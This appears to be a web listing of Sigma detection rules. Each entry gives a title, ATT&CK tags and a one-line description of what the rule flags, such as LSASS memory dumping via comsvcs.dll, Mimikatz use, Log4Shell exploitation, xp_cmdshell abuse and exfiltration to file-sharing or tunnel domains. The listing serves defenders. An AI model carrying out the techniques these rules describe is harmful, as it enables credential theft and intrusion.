Detects changes to the security groups associated with an Elastic Load Balancer (ELB) or Application Load Balancer (ALB). This can indicate that a misconfiguration allowing more traffic into the system than required, or could indicate that an attacker is attempting to enable new connections into a VPC or subnet controlled by the account.

Read More
Loading Diagcab Package From Remote Path

Aug 12, 2024 · attack.execution ·
Share on:

Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability

Read More
Loading of Kernel Module via Insmod

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1547.006 ·
Share on:

Detects loading of kernel modules with insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. Adversaries may use LKMs to obtain persistence within the system or elevate the privileges.

Read More
Local Accounts Discovery

Aug 12, 2024 · attack.discovery attack.t1033 attack.t1087.001 ·
Share on:

Local accounts, System Owner/User discovery using operating systems utilities

Read More
Local File Read Using Curl.EXE

Aug 12, 2024 · attack.execution ·
Share on:

Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.

Read More
Local Groups Discovery - Linux

Aug 12, 2024 · attack.discovery attack.t1069.001 ·
Share on:

Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings

Read More
Local Groups Discovery - MacOs

Aug 12, 2024 · attack.discovery attack.t1069.001 ·
Share on:

Detects enumeration of local system groups

Read More
Local Groups Reconnaissance Via Wmic.EXE

Aug 12, 2024 · attack.discovery attack.t1069.001 ·
Share on:

Detects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

Read More
Local Network Connection Initiated By Script Interpreter

Aug 12, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.

Read More
Local Privilege Escalation Indicator TabTip

Aug 12, 2024 · attack.execution attack.t1557.001 ·
Share on:

Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode

Read More
Local System Accounts Discovery - MacOs

Aug 12, 2024 · attack.discovery attack.t1087.001 ·
Share on:

Detects enumeration of local systeam accounts on MacOS

Read More
Local User Creation

Aug 12, 2024 · attack.persistence attack.t1136.001 ·
Share on:

Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.

Read More
Locked Workstation

Aug 12, 2024 · attack.impact ·
Share on:

Detects locked workstation session events that occur automatically after a standard period of inactivity.

Read More
LockerGoga Ransomware Activity

Aug 12, 2024 · attack.impact attack.t1486 detection.emerging-threats ·
Share on:

Detects LockerGoga ransomware activity via specific command line.

Read More
Log4j RCE CVE-2021-44228 Generic

Aug 12, 2024 · attack.initial-access attack.t1190 detection.emerging-threats ·
Share on:

Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 (Log4Shell)

Read More
Log4j RCE CVE-2021-44228 in Fields

Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-44228 detection.emerging-threats ·
Share on:

Detects exploitation attempt against log4j RCE vulnerability reported as CVE-2021-44228 in different header fields found in web server logs (Log4Shell)

Read More
Logged-On User Password Change Via Ksetup.EXE

Aug 12, 2024 · attack.execution ·
Share on:

Detects password change for the logged-on user's via "ksetup.exe"

Read More
Logging Configuration Changes on Linux Host

Aug 12, 2024 · attack.defense-evasion attack.t1562.006 ·
Share on:

Detect changes of syslog daemons configuration files

Read More
Login to Disabled Account

Aug 12, 2024 · attack.initial-access attack.t1078.004 ·
Share on:

Detect failed attempts to sign in to disabled accounts.

Read More
Logon from a Risky IP Address

Aug 12, 2024 · attack.initial-access attack.t1078 ·
Share on:

Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.

Read More
LOL-Binary Copied From System Directory

Aug 12, 2024 · attack.defense-evasion attack.t1036.003 ·
Share on:

Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.

Read More
LOLBAS Data Exfiltration by DataSvcUtil.exe

Aug 12, 2024 · attack.exfiltration attack.t1567 ·
Share on:

Detects when a user performs data exfiltration by using DataSvcUtil.exe

Read More
Lolbas OneDriveStandaloneUpdater.exe Proxy Download

Aug 12, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json

Read More
LOLBIN Execution From Abnormal Drive

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.

Read More
Lolbin Runexehelper Use As Proxy

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detect usage of the "runexehelper.exe" binary as a proxy to launch other programs

Read More
Lolbin Unregmp2.exe Use As Proxy

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"

Read More
LSA PPL Protection Disabled Via Reg.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1562.010 ·
Share on:

Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process

Read More
LSASS Access Detected via Attack Surface Reduction

Aug 12, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects Access to LSASS Process

Read More
LSASS Access From Non System Account

Aug 12, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects potential mimikatz-like tools accessing LSASS from non system account

Read More
LSASS Access From Potentially White-Listed Processes

Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.s0002 ·
Share on:

Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference

Read More
LSASS Dump Keyword In CommandLine

Aug 12, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.

Read More
Lsass Full Dump Request Via DumpType Registry Settings

Aug 12, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS.

Read More
LSASS Memory Access by Tool With Dump Keyword In Name

Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.s0002 ·
Share on:

Detects LSASS process access requests from a source process with the "dump" keyword in its image name.

Read More
Lsass Memory Dump via Comsvcs DLL

Aug 12, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.

Read More
LSASS Process Dump Artefact In CrashDumps Folder

Aug 12, 2024 · attack.credential-access attack.t1003.001 ·
Share on:

Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.

Read More
LSASS Process Reconnaissance Via Findstr.EXE

Aug 12, 2024 · attack.credential-access attack.t1552.006 ·
Share on:

Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID

Read More
MacOS Emond Launch Daemon

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1546.014 ·
Share on:

Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.

Read More
MacOS Network Service Scanning

Aug 12, 2024 · attack.discovery attack.t1046 ·
Share on:

Detects enumeration of local or remote network services.

Read More
Macos Remote System Discovery

Aug 12, 2024 · attack.discovery attack.t1018 ·
Share on:

Detects the enumeration of other remote systems.

Read More
MacOS Scripting Interpreter AppleScript

Aug 12, 2024 · attack.execution attack.t1059.002 ·
Share on:

Detects execution of AppleScript of the macOS scripting language AppleScript.

Read More
Macro Enabled In A Potentially Suspicious Document

Aug 12, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detects registry changes to Office trust records where the path is located in a potentially suspicious location

Read More
Mailbox Export to Exchange Webserver

Aug 12, 2024 · attack.persistence attack.t1505.003 ·
Share on:

Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it

Read More
Malicious Base64 Encoded PowerShell Keywords in Command Lines

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects base64 encoded strings used in hidden malicious PowerShell command lines

Read More
Malicious DLL File Dropped in the Teams or OneDrive Folder

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.defense-evasion attack.t1574.002 ·
Share on:

Detects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded

Read More
Malicious IP Address Sign-In Failure Rate

Aug 12, 2024 · attack.t1090 attack.command-and-control ·
Share on:

Indicates sign-in from a malicious IP address based on high failure rates.

Read More
Malicious IP Address Sign-In Suspicious

Aug 12, 2024 · attack.t1090 attack.command-and-control ·
Share on:

Indicates sign-in from a malicious IP address known to be malicious at time of sign-in.

Read More
Malicious Named Pipe Created

Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 ·
Share on:

Detects the creation of a named pipe seen used by known APTs or malware.

Read More
Malicious Nishang PowerShell Commandlets

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects Commandlet names and arguments from the Nishang exploitation framework

Read More
Malicious PE Execution by Microsoft Visual Studio Debugger

Aug 12, 2024 · attack.t1218 attack.defense-evasion ·
Share on:

There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger. This option may be used adversaries to execute malicious code by signed verified binary. The debugger is installed alongside with Microsoft Visual Studio package.

Read More
Malicious PowerShell Commandlets - ScriptBlock

Aug 12, 2024 · attack.execution attack.discovery attack.t1482 attack.t1087 attack.t1087.001 attack.t1087.002 attack.t1069.001 attack.t1069.002 attack.t1069 attack.t1059.001 ·
Share on:

Detects Commandlet names from well-known PowerShell exploitation frameworks

Read More
Malicious PowerShell Keywords

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects keywords from well-known PowerShell exploitation frameworks

Read More
Malicious ShellIntel PowerShell Commandlets

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects Commandlet names from ShellIntel exploitation scripts.

Read More
Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure

Aug 12, 2024 · attack.privilege-escalation attack.defense-evasion attack.t1078 attack.t1078.002 ·
Share on:

Detects when an instance identity has taken an action that isn't inside SSM. This can indicate that a compromised EC2 instance is being used as a pivot point.

Read More
Malicious Windows Script Components File Execution by TAEF Detection

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe

Read More
Malware Shellcode in Verclsid Target Process

Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 detection.emerging-threats ·
Share on:

Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro

Read More
Malware User Agent

Aug 12, 2024 · attack.command-and-control attack.t1071.001 ·
Share on:

Detects suspicious user agent strings used by malware in proxy logs

Read More
Manipulation of User Computer or Group Security Principals Across AD

Aug 12, 2024 · attack.persistence attack.t1136.002 ·
Share on:

Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..

Read More
Masquerading as Linux Crond Process

Aug 12, 2024 · attack.defense-evasion attack.t1036.003 ·
Share on:

Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.

Read More
Mavinject Inject DLL Into Running Process

Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055.001 attack.t1218.013 ·
Share on:

Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag

Read More
Measurable Increase Of Successful Authentications

Aug 12, 2024 · attack.defense-evasion attack.t1078 ·
Share on:

Detects when successful sign-ins increased by 10% or greater.

Read More
MERCURY APT Activity

Aug 12, 2024 · attack.execution attack.t1059.001 attack.g0069 detection.emerging-threats ·
Share on:

Detects suspicious command line patterns seen being used by MERCURY APT

Read More
Mesh Agent Service Installation

Aug 12, 2024 · attack.command-and-control attack.t1219 ·
Share on:

Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers

Read More
Metasploit Or Impacket Service Installation Via SMB PsExec

Aug 12, 2024 · attack.lateral-movement attack.t1021.002 attack.t1570 attack.execution attack.t1569.002 ·
Share on:

Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation

Read More
Metasploit SMB Authentication

Aug 12, 2024 · attack.lateral-movement attack.t1021.002 ·
Share on:

Alerts on Metasploit host's authentications on the domain.

Read More
Meterpreter or Cobalt Strike Getsystem Service Installation - Security

Aug 12, 2024 · attack.privilege-escalation attack.t1134.001 attack.t1134.002 ·
Share on:

Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation

Read More
Meterpreter or Cobalt Strike Getsystem Service Installation - System

Aug 12, 2024 · attack.privilege-escalation attack.t1134.001 attack.t1134.002 ·
Share on:

Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation

Read More
Microsoft 365 - Impossible Travel Activity

Aug 12, 2024 · attack.initial-access attack.t1078 ·
Share on:

Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.

Read More
Microsoft 365 - Potential Ransomware Activity

Aug 12, 2024 · attack.impact attack.t1486 ·
Share on:

Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.

Read More
Microsoft 365 - Unusual Volume of File Deletion

Aug 12, 2024 · attack.impact attack.t1485 ·
Share on:

Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.

Read More
Microsoft 365 - User Restricted from Sending Email

Aug 12, 2024 · attack.initial-access attack.t1199 ·
Share on:

Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.

Read More
Microsoft Defender Blocked from Loading Unsigned DLL

Aug 12, 2024 · attack.defense-evasion attack.t1574.002 ·
Share on:

Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL

Read More
Microsoft Defender Tamper Protection Trigger

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects blocked attempts to change any of Defender's settings such as "Real Time Monitoring" and "Behavior Monitoring"

Read More
Microsoft Excel Add-In Loaded From Uncommon Location

Aug 12, 2024 · attack.execution attack.t1204.002 ·
Share on:

Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location

Read More
Microsoft IIS Connection Strings Decryption

Aug 12, 2024 · attack.credential-access attack.t1003 ·
Share on:

Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.

Read More
Microsoft IIS Service Account Password Dumped

Aug 12, 2024 · attack.credential-access attack.t1003 ·
Share on:

Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords

Read More
Microsoft Malware Protection Engine Crash

Aug 12, 2024 · attack.defense-evasion attack.t1211 attack.t1562.001 ·
Share on:

This rule detects a suspicious crash of the Microsoft Malware Protection Engine

Read More
Microsoft Malware Protection Engine Crash - WER

Aug 12, 2024 · attack.defense-evasion attack.t1211 attack.t1562.001 ·
Share on:

This rule detects a suspicious crash of the Microsoft Malware Protection Engine

Read More
Microsoft Office DLL Sideload

Aug 12, 2024 · attack.defense-evasion attack.persistence attack.privilege-escalation attack.t1574.001 attack.t1574.002 ·
Share on:

Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location

Read More
Microsoft Office Protected View Disabled

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 ·
Share on:

Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.

Read More
Microsoft Sync Center Suspicious Network Connections

Aug 12, 2024 · attack.t1055 attack.t1218 attack.execution attack.defense-evasion ·
Share on:

Detects suspicious connections from Microsoft Sync Center to non-private IPs.

Read More
Microsoft Teams Sensitive File Access By Uncommon Applications

Aug 12, 2024 · attack.credential-access attack.t1528 ·
Share on:

Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.

Read More
Microsoft VBA For Outlook Addin Loaded Via Outlook

Aug 12, 2024 · attack.execution attack.t1204.002 ·
Share on:

Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process

Read More
Mimikatz DC Sync

Aug 12, 2024 · attack.credential-access attack.s0002 attack.t1003.006 ·
Share on:

Detects Mimikatz DC sync security events

Read More
Mimikatz Use

Aug 12, 2024 · attack.s0002 attack.lateral-movement attack.credential-access car.2013-07-001 car.2019-04-004 attack.t1003.002 attack.t1003.004 attack.t1003.001 attack.t1003.006 ·
Share on:

This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)

Read More
Mint Sandstorm - AsperaFaspex Suspicious Process Execution

Aug 12, 2024 · attack.execution detection.emerging-threats ·
Share on:

Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm

Read More
Mint Sandstorm - Log4J Wstomcat Process Execution

Aug 12, 2024 · attack.execution detection.emerging-threats ·
Share on:

Detects Log4J Wstomcat process execution as seen in Mint Sandstorm activity

Read More
Mint Sandstorm - ManageEngine Suspicious Process Execution

Aug 12, 2024 · attack.execution detection.emerging-threats ·
Share on:

Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm

Read More
MITRE BZAR Indicators for Execution

Aug 12, 2024 · attack.execution attack.t1047 attack.t1053.002 attack.t1569.002 ·
Share on:

Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE

Read More
MITRE BZAR Indicators for Persistence

Aug 12, 2024 · attack.persistence attack.t1547.004 ·
Share on:

Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.

Read More
MMC Spawning Windows Shell

Aug 12, 2024 · attack.lateral-movement attack.t1021.003 ·
Share on:

Detects a Windows command line executable started from MMC

Read More
MMC20 Lateral Movement

Aug 12, 2024 · attack.execution attack.t1021.003 ·
Share on:

Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of "-Embedding" as a child of svchost.exe

Read More
Modification of IE Registry Settings

Aug 12, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence

Read More
Modification of ld.so.preload

Aug 12, 2024 · attack.defense-evasion attack.t1574.006 ·
Share on:

Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.

Read More
Modify Group Policy Settings

Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1484.001 ·
Share on:

Detect malicious GPO modifications can be used to implement many other malicious behaviors.

Read More
Modify Group Policy Settings - ScriptBlockLogging

Aug 12, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1484.001 ·
Share on:

Detect malicious GPO modifications can be used to implement many other malicious behaviors.

Read More
Modify System Firewall

Aug 12, 2024 · attack.t1562.004 attack.defense-evasion ·
Share on:

Detects the removal of system firewall rules. Adversaries may only delete or modify a specific system firewall rule to bypass controls limiting network usage or access. Detection rules that match only on the disabling of firewalls will miss this.

Read More
Modify User Shell Folders Startup Value

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1547.001 ·
Share on:

Detect modification of the startup key to a path where a payload could be stored to be launched during startup

Read More
Modifying Crontab

Aug 12, 2024 · attack.persistence attack.t1053.003 ·
Share on:

Detects suspicious modification of crontab file.

Read More
Monitoring For Persistence Via BITS

Aug 12, 2024 · attack.defense-evasion attack.t1197 ·
Share on:

BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.

Read More
Moriya Rootkit - System

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1543.003 ·
Share on:

Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report

Read More
Moriya Rootkit File Created

Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1543.003 detection.emerging-threats ·
Share on:

Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.

Read More
Mount Execution With Hidepid Parameter

Aug 12, 2024 · attack.credential-access attack.t1564 ·
Share on:

Detects execution of the "mount" command with "hidepid" parameter to make invisible processes to other users from the system

Read More
MSExchange Transport Agent Installation

Aug 12, 2024 · attack.persistence attack.t1505.002 ·
Share on:

Detects the Installation of a Exchange Transport Agent

Read More
MSExchange Transport Agent Installation - Builtin

Aug 12, 2024 · attack.persistence attack.t1505.002 ·
Share on:

Detects the Installation of a Exchange Transport Agent

Read More
MSHTA Suspicious Execution 01

Aug 12, 2024 · attack.defense-evasion attack.t1140 attack.t1218.005 attack.execution attack.t1059.007 cve.2020-1599 ·
Share on:

Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism

Read More
Mshtml.DLL RunHTMLApplication Suspicious Usage

Aug 12, 2024 · attack.defense-evasion attack.execution ·
Share on:

Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)

Read More
MSI Installation From Suspicious Locations

Aug 12, 2024 · attack.execution ·
Share on:

Detects MSI package installation from suspicious locations

Read More
MSI Installation From Web

Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.t1218.007 ·
Share on:

Detects installation of a remote msi file from web.

Read More
MsiExec Web Install

Aug 12, 2024 · attack.defense-evasion attack.t1218.007 attack.command-and-control attack.t1105 ·
Share on:

Detects suspicious msiexec process starts with web addresses as parameter

Read More
MSMQ Corrupted Packet Encountered

Aug 12, 2024 · attack.execution detection.emerging-threats ·
Share on:

Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation

Read More
MSSQL Add Account To Sysadmin Role

Aug 12, 2024 · attack.persistence ·
Share on:

Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role

Read More
MSSQL Disable Audit Settings

Aug 12, 2024 · attack.defense-evasion ·
Share on:

Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" transaction in order to delete or disable audit logs on the server

Read More
MSSQL Extended Stored Procedure Backdoor Maggie

Aug 12, 2024 · attack.persistence attack.t1546 detection.emerging-threats ·
Share on:

This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server

Read More
MSSQL Server Failed Logon

Aug 12, 2024 · attack.credential-access attack.t1110 ·
Share on:

Detects failed logon attempts from clients to MSSQL server.

Read More
MSSQL Server Failed Logon From External Network

Aug 12, 2024 · attack.credential-access attack.t1110 ·
Share on:

Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack.

Read More
MSSQL SPProcoption Set

Aug 12, 2024 · attack.persistence ·
Share on:

Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started

Read More
MSSQL XPCmdshell Option Change

Aug 12, 2024 · attack.execution ·
Share on:

Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed.

Read More
MSSQL XPCmdshell Suspicious Execution

Aug 12, 2024 · attack.execution ·
Share on:

Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands

Read More
Mstsc.EXE Execution From Uncommon Parent

Aug 12, 2024 · attack.lateral-movement ·
Share on:

Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.

Read More
Mstsc.EXE Execution With Local RDP File

Aug 12, 2024 · attack.command-and-control attack.t1219 ·
Share on:

Detects potential RDP connection via Mstsc using a local ".rdp" file

Read More
Msxsl.EXE Execution

Aug 12, 2024 · attack.defense-evasion attack.t1220 ·
Share on:

Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.

Read More
Multifactor Authentication Denied

Aug 12, 2024 · attack.initial-access attack.credential-access attack.t1078.004 attack.t1110 attack.t1621 ·
Share on:

User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.

Read More
Multifactor Authentication Interrupted

Aug 12, 2024 · attack.initial-access attack.credential-access attack.t1078.004 attack.t1110 attack.t1621 ·
Share on:

Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.

Read More
Mustang Panda Dropper

Aug 12, 2024 · attack.t1587.001 attack.resource-development detection.emerging-threats ·
Share on:

Detects specific process parameters as used by Mustang Panda droppers

Read More
Named Pipe Created Via Mkfifo

Aug 12, 2024 · attack.execution ·
Share on:

Detects the creation of a new named pipe using the "mkfifo" utility

Read More
Narrator's Feedback-Hub Persistence

Aug 12, 2024 · attack.persistence attack.t1547.001 ·
Share on:

Detects abusing Windows 10 Narrator's Feedback-Hub

Read More
NET NGenAssemblyUsageLog Registry Key Tamper

Aug 12, 2024 · attack.defense-evasion attack.t1112 ·
Share on:

Detects changes to the NGenAssemblyUsageLog registry key. .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.

Read More
Net WebClient Casing Anomalies

Aug 12, 2024 · attack.execution attack.t1059.001 ·
Share on:

Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques

Read More
Netcat The Powershell Version

Aug 12, 2024 · attack.command-and-control attack.t1095 ·
Share on:

Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network

Read More
NetNTLM Downgrade Attack

Aug 12, 2024 · attack.defense-evasion attack.t1562.001 attack.t1112 ·
Share on:

Detects NetNTLM downgrade attack

Read More
Netsh Allow Group Policy on Microsoft Defender Firewall

Aug 12, 2024 · attack.defense-evasion attack.t1562.004 ·
Share on:

Adversaries may modify system firewalls in order to bypass controls limiting network usage

Read More
NetSupport Manager Service Install

Aug 12, 2024 · attack.persistence ·
Share on:

Detects NetSupport Manager service installation on the target system.

Read More
Network Communication Initiated To Portmap.IO Domain

Aug 12, 2024 · attack.t1041 attack.command-and-control attack.t1090.002 attack.exfiltration ·
Share on:

Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors

Read More
Network Communication With Crypto Mining Pool

Aug 12, 2024 · attack.impact attack.t1496 ·
Share on:

Detects initiated network connections to crypto mining pools

Read More
Network Connection Initiated By AddinUtil.EXE

Aug 12, 2024 · attack.defense-evasion attack.t1218 ·
Share on:

Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.

Read More
Network Connection Initiated By Eqnedt32.EXE

Aug 12, 2024 · attack.execution attack.t1203 ·
Share on:

Detects network connections from the Equation Editor process "eqnedt32.exe".

Read More
Network Connection Initiated By IMEWDBLD.EXE

Aug 12, 2024 · attack.command-and-control attack.t1105 ·
Share on:

Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.

Read More
Network Connection Initiated By Regsvr32.EXE

Aug 12, 2024 · attack.execution attack.t1559.001 attack.defense-evasion attack.t1218.010 ·
Share on:

Detects a network connection initiated by "Regsvr32.exe"

Read More
Network Connection Initiated To AzureWebsites.NET By Non-Browser Process

Aug 12, 2024 · attack.command-and-control attack.t1102 attack.t1102.001 ·
Share on:

Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.

Read More
Network Connection Initiated To Cloudflared Tunnels Domains

Aug 12, 2024 · attack.exfiltration attack.command-and-control attack.t1567.001 ·
Share on:

Detects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.

Read More
Network Connection Initiated To Mega.nz

Aug 12, 2024 · attack.exfiltration attack.t1567.001 ·
Share on:

Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.

Read More
Network Connection Initiated Via Notepad.EXE

Aug 12, 2024 · attack.command-and-control attack.execution attack.defense-evasion attack.t1055 ·
Share on:

Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network communication except when printing documents for example.

Read More
Network Reconnaissance Activity

Aug 12, 2024 · attack.discovery attack.t1087 attack.t1082 car.2016-03-001 ·
Share on:

Detects a set of suspicious network related commands often used in recon stages

Read More
Network Sniffing - Linux

Aug 12, 2024 · attack.credential-access attack.discovery attack.t1040 ·
Share on:

Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.

Read More
Network Sniffing - MacOs

Aug 12, 2024 · attack.discovery attack.credential-access attack.t1040 ·
Share on:

